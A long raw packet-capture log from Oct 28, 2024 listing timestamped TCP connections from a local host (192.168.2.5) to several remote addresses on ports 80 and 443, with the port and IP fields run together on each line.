                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.274868965 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.274882078 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.274909019 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.274936914 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.275579929 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.275592089 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.275604010 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.275614023 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.275633097 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.275661945 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.276175976 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.276319981 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.280373096 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.280383110 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.280432940 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.282207966 CET44349817162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.282558918 CET49817443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.282608032 CET44349817162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.284061909 CET44349817162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.284137011 CET49817443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.284962893 CET44349818162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.285059929 CET49817443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.285192013 CET44349817162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.285214901 CET49818443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.285222054 CET44349818162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.286664009 CET44349818162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.286725044 CET49818443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.286788940 CET44349815162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.287122011 CET49818443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.287201881 CET44349818162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.287476063 CET49815443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.287497997 CET44349815162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.287843943 CET44349815162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.288134098 CET49793443192.168.2.5142.250.184.193
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.288450956 CET49815443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.288522959 CET44349815162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.289290905 CET44349816162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.289556026 CET49816443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.289565086 CET44349816162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.290642977 CET44349816162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.290837049 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.290962934 CET49816443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.291169882 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.291244030 CET49793443192.168.2.5142.250.184.193
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.291253090 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.291271925 CET44349816162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.291296959 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.291349888 CET49793443192.168.2.5142.250.184.193
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.291412115 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.293771982 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.293884039 CET49793443192.168.2.5142.250.184.193
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.293896914 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.301306963 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.301373959 CET49793443192.168.2.5142.250.184.193
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.301387072 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.301624060 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.301690102 CET49793443192.168.2.5142.250.184.193
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.301954985 CET49793443192.168.2.5142.250.184.193
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.301975012 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.391011000 CET49818443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.391016960 CET44349818162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.391047001 CET49816443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.391977072 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.392003059 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.392014027 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.392020941 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.392066956 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.392066956 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.392143965 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.392188072 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.392359018 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.392370939 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.392383099 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.392395020 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.392406940 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.392452955 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.393023014 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.393066883 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.393198013 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.393241882 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.393296003 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.393318892 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.393331051 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.393340111 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.393342972 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.393378973 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.393379927 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.486783981 CET49827443192.168.2.5152.195.19.97
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.486835957 CET44349827152.195.19.97192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.486910105 CET49827443192.168.2.5152.195.19.97
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.487096071 CET49827443192.168.2.5152.195.19.97
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.487123013 CET44349827152.195.19.97192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.489984989 CET4434980720.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.495244980 CET49817443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.495260954 CET44349817162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.495296001 CET49815443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.509145975 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.509215117 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.509275913 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.509288073 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.509340048 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.509525061 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.509536028 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.509581089 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.509809971 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.509821892 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.509836912 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.509860039 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.509884119 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.510148048 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.510159016 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.510170937 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.510191917 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.510230064 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.510798931 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.510812044 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.510842085 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.510874987 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.510886908 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.511071920 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.551517010 CET49818443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.553818941 CET4434981913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.555210114 CET49819443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.555229902 CET4434981913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.555850029 CET49819443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.555855989 CET4434981913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.604836941 CET4434980720.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.604917049 CET49807443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.604980946 CET49807443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.604991913 CET4434980720.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.605003119 CET49807443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.605010033 CET4434980720.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.626365900 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.626434088 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.626476049 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.626488924 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.626509905 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.626539946 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.626888037 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.626899958 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.626952887 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.627127886 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.627140999 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.627151012 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.627176046 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.627197981 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.627541065 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.627553940 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.627564907 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.627598047 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.627628088 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.628057003 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.628070116 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.628113031 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.628360033 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.628371000 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.628420115 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.633459091 CET49828443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.633476973 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.633651018 CET49828443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.633811951 CET49828443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.633824110 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.682640076 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.682849884 CET49821443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.682882071 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.684390068 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.684473991 CET49821443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.685472012 CET49821443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.685653925 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.685707092 CET49821443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.685831070 CET4434981913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.686499119 CET4434981913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.686707973 CET49819443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.686894894 CET49819443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.686903954 CET4434981913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.686914921 CET49819443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.686919928 CET4434981913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.690160990 CET49829443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.690206051 CET4434982913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.691237926 CET49829443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.691452980 CET49829443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.691487074 CET4434982913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.693387032 CET49817443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.703794003 CET4434982213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.704256058 CET49822443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.704267979 CET4434982213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.704705000 CET49822443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.704710960 CET4434982213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.717355013 CET4434982313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.717937946 CET49823443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.717977047 CET4434982313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.718631029 CET49823443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.718643904 CET4434982313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.724729061 CET4434982513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.725485086 CET49825443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.725517988 CET4434982513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.726033926 CET49825443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.726041079 CET4434982513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.727406025 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.734153986 CET4434982413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.734530926 CET49824443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.734544992 CET4434982413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.734993935 CET49824443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.734997988 CET4434982413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.744239092 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.744302988 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.744313955 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.744332075 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.744360924 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.744360924 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.744481087 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.744499922 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.744512081 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.744529009 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.744532108 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.744587898 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.745136023 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.745222092 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.745277882 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.745321989 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.745332956 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.745343924 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.745354891 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.745378017 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.745404959 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.820653915 CET443498264.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.823419094 CET49830443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.823435068 CET4434983013.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.823606968 CET49826443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.823621988 CET49830443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.823636055 CET443498264.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.823838949 CET49830443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.823851109 CET4434983013.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.824150085 CET443498264.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.824232101 CET49826443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.825146914 CET443498264.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.825534105 CET49826443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.826370955 CET49826443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.826463938 CET443498264.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.826584101 CET49826443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.826598883 CET443498264.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.826661110 CET49826443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.839212894 CET4434982213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.839409113 CET4434982213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.839512110 CET49822443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.839608908 CET49822443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.839617014 CET4434982213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.839626074 CET49822443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.839629889 CET4434982213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.845418930 CET49831443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.845463037 CET4434983113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.845545053 CET49831443192.168.2.513.107.246.60
